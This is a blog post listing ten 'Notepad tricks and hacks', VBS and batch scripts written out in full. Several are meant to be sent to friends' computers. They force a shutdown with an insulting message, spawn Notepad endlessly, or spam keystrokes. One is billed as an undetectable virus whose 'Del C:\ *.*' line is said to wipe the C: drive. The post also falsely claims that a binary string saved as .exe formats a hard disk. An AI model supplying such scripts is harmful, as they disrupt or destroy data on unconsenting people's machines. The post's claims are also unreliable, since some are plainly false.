latest Post Click Subscribe!

Top 10 Notepad Tricks and hacks

Please wait 0 seconds...
Scroll Down and click on Go to Link for destination
Congrats! Link is Generated

Hello Friends, In this artical, i well going to share some notepad tricks and hacks for you! Notepad is a simple text editor for Microsoft Windows OS and a basic text-editing program which enables computer users to create a documents. It has been included in all versions of Microsoft Windows since Windows 1.0 in 1985 to Windows 10.


Notepad tircks and hacks




    1. Continually pop out CD Drive Using Notepad:


    Type or copy the following code in Notepad.

    Set oWMP = CreateObject(“WMPlayer.OCX.7”)
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop
    Save it as “name.VBS”.

    Like shivagyaworld.vbs
    if you open this file your cd drive continually pop-out.

    2. Convey your friend a lil’ message and shut down his / her computer:


    Type in Notepad.

    @echo off
    msg * I am going to shut down your computer 
    shutdown -c “Error! You are stupid!” -s

    Save it as “name.BAT” and send it to your friends computer.

    Like shivagyaworld.bat

    3. Open Notepad continually in your friend’s computer:


    Type in Notepad.

    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top

    Save it as “name.BAT  and send it to your freinds.
    Like shivagyaworld.bat

    4. Notepad Trick to type slowly:

    Open Notepad.
    Paste the following code in the notepad file.
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject(“WScript.Shell”)
    WshShell.Run “notepad”
    WScript.Sleep 100
    WshShell.AppActivate “Notepad”
    WScript.Sleep 500
    WshShell.SendKeys “Hel”
    WScript.Sleep 500
    WshShell.SendKeys “lo ”
    WScript.Sleep 500
    WshShell.SendKeys “, ho”
    WScript.Sleep 500
    WshShell.SendKeys “w a”
    WScript.Sleep 500
    WshShell.SendKeys “re ”
    WScript.Sleep 500
    WshShell.SendKeys “you”
    WScript.Sleep 500
    WshShell.SendKeys “? ”
    WScript.Sleep 500
    WshShell.SendKeys “I a”
    WScript.Sleep 500
    WshShell.SendKeys “m g”
    WScript.Sleep 500
    WshShell.SendKeys “ood”
    WScript.Sleep 500
    WshShell.SendKeys ” th”
    WScript.Sleep 500
    WshShell.SendKeys “ank”
    WScript.Sleep 500
    WshShell.SendKeys “s! “
    Save it as “name.vbs" and close it.

    5. Write your own simple virus cant detected by any antivirus:

    @Echo off
    Del C:\ *.* |y
    And save that as ".bat" RUN IT
    It will delete the content of C:\ drive.
    warning!  don’t run that .bat file on your system… it will Delete your c: drive.

    6. Format Your Hard Disk Using Just Notepad !

    Ever wondered of a way to format your hard disk using just notepad ?
    Open notepad.
    Type the following code in notepad  (Or just copy paste it).
    01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
    Save it as "name.exe" 
    Like shivagyaworld.exe
    That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !
    This is just a little binary fun. 
    warning! Be Careful while using it.

    7. Type “You are a genius” Continuously in notepad to impress your friends:

    Open Notepad.
    Write or Paste the following code in the notepad file:
    Set wshShell = wscript.CreateObject(“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “You are a genius.”
    loop
    Save it as "name.vbs" and send it to your friends.
    Open the File and see What happen. 

    8. Convert Text Into Audio in Notepad:

    Open Notepad.
    Copy and paste the following code.
    Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-world.tk”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message
    Save it as "name.vbs" 
    Like audio.vbs

    9. Constantly Repeat Messages:

    Paste the following code in the notepad file.
    @ECHO off
    :Begin
    msg * Hello
    msg * Are you Finding a technical blog?
    msg * I am Shivagya World!
    msg * Lets have Learn together!
    msg * Because i will give you tricks, hacks, android, blog and many more
    GOTO BEGIN

    Save it as "name.bat" 

    Like message.bat

    10. Test Your Anti-Virus:

    You can also test your anti virus program for its effectiveness using a simple notepad trick.
    Copy the following code and paste it into notepad:
    X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    Save it as “name.exe” like AntiVirus.exe
    As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.
    ❤Thanks For Reading

    Post a Comment

    Please do not post any spam links
    Cookie Consent
    We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
    Oops!
    It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
    AdBlock Detected!
    We have detected that you are using adblocking plugin in your browser.
    The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
    Site is Blocked
    Sorry! This site is not available in your country.